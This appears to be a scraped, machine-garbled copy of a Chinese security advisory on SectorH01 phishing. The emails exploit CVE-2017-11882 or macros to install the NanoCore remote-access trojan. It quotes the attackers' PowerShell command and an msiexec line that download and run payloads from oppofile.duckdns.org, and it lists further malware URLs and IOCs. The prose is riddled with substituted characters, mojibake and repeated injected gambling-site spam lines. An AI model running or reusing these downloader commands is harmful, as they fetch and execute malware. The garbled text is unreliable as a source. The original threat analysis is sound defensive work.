首页 > 安全钻研 > 安全传递 > 安全公告

SectorH01攻击组织垂钓邮件事务安全公告

颁布功夫 2019-09-22

事务布景

近期检测到SectorH01攻击组织“商贸信”垂钓邮件攻击在9月出现新一轮增长。。。。。。。。在这次攻击中，，，，，，黑客精心机关的带有office公式编纂器缝隙CVE-2017-11882或宏代码的恶意文档，，，，，，将其作为附件批量发送至表贸行业企业邮箱中，，，，，，在其打开文档中招后植入远控木马NanoCore进行机密信息窃取和远程节造，，，，，，本次攻击顶峰时期每天成功投递超3000个邮件地址。。。。。。。。

事务描述

通过溯源分析，，，，，，我们发现黑客疑似使用一款名为“****邮件群发器”的软件进行邮箱地址采集和邮件批量投递。。。。。。。。据测算，，，，，，该软件拥有5000个/幼时的邮箱地址采集能力，，，，，，并且在发件时能够自动更换代理IP，，，，，，已被黑客利用于针对对表贸企业的“自动化”攻击。。。。。。。。部门受攻击企业如下：

8827太阳集团(Macau)股份有限公司-Official website

凭据统计数据，，，，，，有超过1000家企业受到这次攻击影响，，，，，，其中近一半以上散布在广东、江苏、浙江和上海四地，，，，，，其中广东占比超过30%。。。。。。。。出格是广东丽江和汉中由于造作业和表贸行业密集，，，，，，成为本次攻击受害最严沉的区域。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

从行业散布来看，，，，，，“商贸信”攻击指标重要集中在工业造作及业务行业。。。。。。。。统计数据显示，，，，，，被攻击的88%为造作业，，，，，，渣滓12%是与造作业提供有关联的销售、运输、商务服务行业。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

事务分析

垂钓邮件重要通过伪造以下发件邮箱进行发送，，，，，，其中使用最多的为

kieth@sdgtrading.co.uk
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

以其中一封邮件为例，，，，，，从邮件头部信息中能够看到发件报答“Keith Ward/SDG /UK”，，，，，，发件邮箱地址为kieth@sdgtrading.co.uk。。。。。。。。sdgtrading是一家总部位于英国的进出口业务公司，，，，，，目前打开该公司官方网站能够正常接见。。。。。。。。

打开网站的contact-us页面我们发现有一个职务为UK & European Sales(英国及欧洲地域销售)的人员联系方式为keith@sdgtrading.co.uk，，，，，，而这正是垂钓邮件发件邮箱(有两个字母地位互换)。。。。。。。。我们揣摩攻击者可能通过爬取或者人为网络的方式获取了该业务公司的邮件地址，，，，，，而后假装成该公司的销售人员发送垂钓邮件进行攻击。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

垂钓邮件发件人信息

8827太阳集团(Macau)股份有限公司-Official website

业务公司销售人员信息

垂钓邮件

邮件内容是关于业务订单确认和价值征询。。。。。。。。邮件表述中高频出现出现以下词句：
“订购”、“价值”、“价目表”、“销售前提”、“折扣”、“装运日期”、“采购规格”等。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

邮件中还指出邮件附件中蕴含“想要采购的产品条款”文档，，，，，，请阅读后进行回复，，，，，，部门文档名如下：

RFQ0591403-SDG.doc

RFQ015770082.doc

分析发现，，，，，，附件文档中蕴含Office公式编纂器缝隙CVE-2017-11882利用代码或恶意宏代码，，，，，，经过缝隙攻击或宏代码执行过程，，，，，，会触发用于下载木马的Powershell号令执行，，，，，，进一步下载木马：

'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'

除了利用Powershell，，，，，，还有部门攻击中使用Windows装置法式(msiexec.exe)装置MSI包文件进行木马下载：

msiEXEc /i http[:]//oppofile.duckdns.org/d/dar.msi

从目前捕获到的攻击文档中我们发现有以下木马下载地址：

hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi

远控木马

被下载植入的现实上是的经过混合的远控木马NanoCore，，，，，，NanoCore是使用.Net说话编写的职能壮大的远程接见节造木马（RAT），，，，，，能够在指标主机上进行文件操作，，，，，，屏幕节造，，，，，，运行指定法式，，，，，，还支持插件扩大职能，，，，，，被习染NanoCore木马的电脑会出现严沉信息泄露，，，，，，攻击者还能够利用中毒电脑为跳板，，，，，，对指标网络持续进行渗入入侵。。。。。。。。

主题�？？？？？？楸患用芎笠晕煌继迨奖Ａ粼谧试次募�

“tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt”中

8827太阳集团(Macau)股份有限公司-Official website

从资源中获取到数据后，，，，，，经过屡次解密得到最终的PE文件，，，，，，而后将其Load到内存，，，，，，并跳转到入口地位执杏祝。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

最终执行的NanoCore木马职能壮大，，，，，，可执行各类恶意操作，，，，，，如文件操作，，，，，，注册表编纂，，，，，，过程节造，，，，，，文件传输，，，，，，远程号令执行，，，，，，键盘纪录等。。。。。。。。以下为该木马节造端界面：

8827太阳集团(Macau)股份有限公司-Official website

群发软件

通过排查，，，，，，发现了一个名为“***\邮件群发器.exe”的可疑法式，，，，，，使用该可疑文件名中的“***邮件群发器”关键字进行搜索，，，，，，发现了这款名为****的邮件群发器软件。。。。。。。。该软件拥有从网络上批量爬取邮箱地址，，，，，，并针对获得的邮箱进行批量发送指定邮件的职能。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

我们下载该软件，，，，，，并进行注册和试用。。。。。。。。凭据其界面展示的职能，，，，，，只需编写好邮件内容(肆意填写发件人姓名)、批量增长收件人地址、点击“起头群发”三步，，，，，，即可将邮件急剧发送至大批的指标邮箱钟祝。。。。。。。

该软件还支持查看群发了局，，，，，，若是有发送失败的情况，，，，，，能够一键沉发。。。。。。。。发送时还能够选择自动更换代理IP，，，，，，这在肯定水平上能够暗藏真实发件IP。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

该软件还有一个沉要的职能是，，，，，，支持从指定网站采集指标邮箱。。。。。。。。该职能页面默认的源网站地址为http[:]//www.****.biz/。。。。。。。。我们尝试使用该网站进行邮箱采集，，，，，，在10分钟之内能够采集到近800个邮箱地址，，，，，，换算后一个幼时之内能够采集到5000个邮箱，，，，，，而这些被采集到的邮箱都存在被攻击的可能。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

能够看到这个默认的邮箱采集网站“**网”(www.*****.biz)是一个业务信息颁布平台，，，，，，大量厂商(机械、化工、电气、能源、仪器等行业)在该网站上颁布等各类产品的供给或求购信息。。。。。。。。而每一条信息城市附带厂商的电话、邮编、邮箱等联系方式，，，，，，“****邮件群发器」佚是从这些信息中获取了大量的邮箱地址。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

攻击思路

从以下几个角度，，，，，，我们以为黑客使用了邮件群发软件“****邮件群发器”进行辅助攻击：

1、群发软件“****”有近期接见发件人IP的纪录；；；；；；；；
2、受害企衣粪型与“****邮件群发器”默认采集邮箱类型一致(工业品业务公司)；；；；；；；；
3、攻击的影响领域与该软件的采集能力吻合(受害邮箱约3000个/日 & 软件的采集能力约5000个/幼时)。。。。。。。。
揣摩黑客执行攻击的思路如下：
1、黑客下载邮件群发软件；；；；；；；；
2、机关带有CVE-2017-11882缝隙利用(或者宏代码)的office恶意文件；；；；；；；；
3、使用****邮件群发器从业务分类信息网站批量采集指标邮箱地址；；；；；；；；
4、使用筹备好的恶意文档作为附件，，，，，，机关垂钓邮件并批量发送；；；；；；；；
5、期待收件人打开附件并中招，，，，，，通过远控木马NanoCore对指标进行远程节造。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

总结

在这次攻击事务中能够发现，，，，，，黑客与灰产从业人员出现了交集。。。。。。。�；；；；；；；；也嗽笨⒊鲇始悍⒐ぞ撸�，，，，工具可针对网站上的公开邮箱进行爬取！�。。。。。。�，，，，可利用获取到的邮箱进行批量群发邮件。。。。。。。。工具在其注册的“官网”上进行公开售卖，，，，，，使用注明钟装正义”地提到“仅用于正规邮件营销，，，，，，滥用者后果得意”。。。。。。。。但工具一旦售出，，，，，，便难以保障被用于合法用处。。。。。。。。

而黑客获得此软件后，，，，，，将其纳入攻击兵器中的一员。。。。。。。。随后，，，，，，只需编写好木马，，，，，，机关垂钓邮件，，，，，，就能够利用该工具将垂钓邮件自动化、大批量地发送至企业的有关邮箱钟祝。。。。。。。

建复建议

1、企业邮箱网管将以下发件邮箱设置为黑名单

kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

2、不要打开不明起源的邮件附件，，，，，，对于附件中的文件要审慎运行，，，，，，如发现有剧本或其他可执行文件可先使用杀毒软件进行扫描；；；；；；；；

3、升级office系列软件到最新版本，，，，，，实时建复office法式缝隙，，，，，，不要轻易运行不成信文档中的宏；；；；；；；；

4、推荐部署终端安全治理系统防御病毒木马攻击；；；；；；；；

5、使用入侵检测系统检测未知黑客的各类可疑攻击行为。。。。。。。。

IOC

邮箱

kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

邮件附件

fec34e9741abedea7f0a4fa991bdc618
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905

a9958884c16f17c2c9e4d75f92117352

NanaCore木马

2c7885159feae6ebde634418591ad276

453a235ad5ea7055f2af2c51c95a5bb2

域名

oppofile.duckdns.org

URL

hxxp://oppofile.duckdns.org/e/gmb.msi

参考链接

https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合多数据书生电子

司法申明

8827太阳集团

网络安全防护

网络安全检测

利用安全

数据安全

安全治理

云安全

工控安全

移动及终端安全

密码利用安全

大模型利用安全

专业安全服务

安全运营中心

知白学院

威胁谍报中心

安全传递

钻研汇报

安全团队

渠路系统

售后服务

升级布告

软件升级

公司概况

新闻动态

技术专题

人才招聘

投资者关系

资源中心

联系8827太阳集团

安全钻研

SectorH01攻击组织垂钓邮件事务安全公告

关于8827太阳集团

解决规划

安全钻研

联系8827太阳集团

7*24幼时服务热线